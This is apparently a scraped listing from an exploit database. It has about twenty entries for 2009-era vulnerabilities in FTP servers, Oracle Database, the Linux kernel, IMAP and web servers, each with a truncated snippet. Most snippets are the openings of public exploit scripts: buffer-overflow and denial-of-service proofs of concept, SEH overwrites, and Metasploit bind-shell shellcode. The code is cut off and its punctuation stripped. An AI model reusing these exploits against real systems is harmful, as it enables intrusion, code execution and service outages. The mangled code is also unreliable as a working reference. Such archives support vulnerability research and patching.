XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

Date of Discovery: 10-Nov-2009 Credits:zhangmcatmail.ustc.edu.cn Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP...

Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service

int mainvoid int ret; int csd; int lsd; struct sockaddrun sun; / make an abstruct name address / memset&sun, 0, sizeofsun; sun.sunfamily = PFUNIX; sprintf&sun.sunpath1, "%d", getpid; / create the listening socket and shutdown / lsd = socketAFUNIX, SOCKSTREAM, 0; bindlsd, struct sockaddr &sun,...

Linux Kernel 2.6.31.4 - unix_stream_connect() Local Denial of Service

Linux Kernel 2.6.31.4 - unixstreamconnect Local Denial of Service int mainvoid int ret; int csd; int lsd; struct sockaddrun sun; / make an abstruct name address / memset&sun, 0, sizeofsun; sun.sunfamily = PFUNIX; sprintf&sun.sunpath1, "%d", getpid; / create the listening socket and shutdown / lsd...

Oracle Network Authentication CVE-2009-1979 Remote Buffer Overflow Vulnerability

No description provided by source. include winsock2.h include stdio.h include string.h include windows.h include assert.h include string void ssend SOCKET s, char msg, DWORD size int sent; printf "ssend: begin: %d bytes\n", size; sent=send s, charmsg, size, 0; if sent==SOCKETERROR printf "send -...

Oracle Database 10.1.0.5 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow

Oracle Database 10.1.0.5 10.2.0.4 - AUTHSESSKEY Length Validation Remote Buffer Overflow include include include include include include void ssend SOCKET s, char msg, DWORD size int sent; printf "ssend: begin: %d bytes\n", size; sent=send s, charmsg, size, 0; if sent==SOCKETERROR printf "send -...

MiniShare 1.5.5 - Remote Buffer Overflow

/ MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit by eMP3R0r TEAM This bug Expl0ited and Discovered by iM4n Sp Tnx2 : Shabgard & Aria Security FOrum The Crimson Idol / include include include include include pragma commentlib, "ws232.lib" define buffer 557 define PORT 80 define NOP 0x9...

MiniShare HTTP 1.5.5 BoF

No description provided by source. / MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit by eMP3R0r TEAM This bug Expl0ited and Discovered by iM4n Sp Tnx2 : Shabgard & Aria Security FOrum The Crimson Idol / include winsock2.h include stdio.h include string.h include stdlib.h include dos.h...

ZoIPer 2.22 - Call-Info Remote Denial of Service

!/usr/bin/python ZoIPer v2.22 Call-Info Remote Denial Of Service. Remote Crash P.O.C. Author: Tomer Bitton Gr33nG0bL1n Tested on Windows XP SP2 , SP3 , Ubuntu 8.10 Vendor Notified on: 21/09/2009 Vendor Fix: Fixed in version 2.24 Library 5324 Bad Chars: \x20 , \x09 import sys import socket import ...

ProFTPd 1.3.0 (OpenSUSE) - mod_ctrls Local Stack Overflow

ProFTPd 1.3.0 OpenSUSE - modctrls Local Stack Overflow !/usr/bin/perl -w Exploit for the ProFTPd modctrls vulnerability. Stack Overflow in function int prctrlsrecvrequestprcrlsclt cl unchecked buffer for arguments of the module connects to the unix domain socket and sends a string that is longer...

ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)

No description provided by source. !/usr/bin/perl -w Exploit for the ProFTPd modctrls vulnerability. Stack Overflow in function int prctrlsrecvrequestprcrlsclt cl unchecked buffer for arguments of the module connects to the unix domain socket and sends a string that is longer than the buffer...

SuSE9 Security Update : multipath-tools (YOU Patch Number 12377)

The default permissions on the multipathd socket file were to generous and allowed any user to connect. CVE-2009-0115 This update also contains the following fixes : - multipathd is not started for single paths bnc473841 - Backport maxfds parameter bnc457632 - Rename NetApp prio callout to 'ontap...

kernel: uninit op in SOCKOPS_WRAP() leads to privesc

The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in protoops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on...

FtpXQ FTP Server 3.0 Remote Denial of Service Exploit (auth)

Exploit for unknown platform in category dos / poc ============================================================ FtpXQ FTP Server 3.0 Remote Denial of Service Exploit auth ============================================================ !/usr/bin/python print "" print " Iranian Pentesters Home " print...

IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit

Exploit for windows platform in category remote exploits =========================================================== IPSwitch IMAP Server include include include include "winsock2.h" pragma commentlib, "ws232" define usage voidfprintfstderr, "Ipsbitch vs Ipswitch IMAP \n\nExample: ipsbitch.exe ip...

Cerberus FTP Server 3.0.3 - Remote Denial of Service

Cerberus FTP Server 3.0.3 - Remote Denial of Service / vulnerab : Remote Denial of Service Command vulnerab : User Software : Cerberus FTP Server Versian : 3.0.3 website software : http://www.cerberusftp.com greetz : Str0ke Milw0rm is The best in world / include include include include include...

Kolibri+ Web Server 2 - GET Remote Overwrite (SEH)

!/usr/bin/python Could not get this to work on XP SP3. php5ts.dll is the only module with safe seh off but could not get the pop pop ret to work correctly despite the large number of usable addresses that were tested. $ ./kolibri.py 192.168.1.146 8080 Kolibri+ Webserver 2 SEH Overwrite Written by...

SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)

No description provided by source. !/usr/bin/python import socket, sys, ldap print " SidVault 2.0e Windows Universal Buffer Overflow Exploit SEH" print " Original author : blake" print " Seh Exploit : Skull-Hacker" print " Tested on Windows XP SP3" if lensys.argv!=2: print " Usage: %s ip" %...

SIDVault 2.0e - Windows Universal Buffer Overflow (SEH)

!/usr/bin/python import socket, sys, ldap print " SidVault 2.0e Windows Universal Buffer Overflow Exploit SEH" print " Original author : blake" print " Seh Exploit : Skull-Hacker" print " Tested on Windows XP SP3" if lensys.argv!=2: print " Usage: %s " % sys.argv0 sys.exit0 win32exec - EXITFUNC=s...

FTPShell Client 4.1 RC2 - Remote Buffer Overflow (Universal)

!/usr/bin/python | || | / \ | | | | | | | | | - from socket import import os import time win32bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com stage2 = "\x44\x7A\x32\x37\x44\x7A\x32\x37" "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"...

FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)

Exploit for windows platform in category remote exploits ============================================================= FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit univ ============================================================= !/usr/bin/python | || | / \ | | | | | | | | | - from...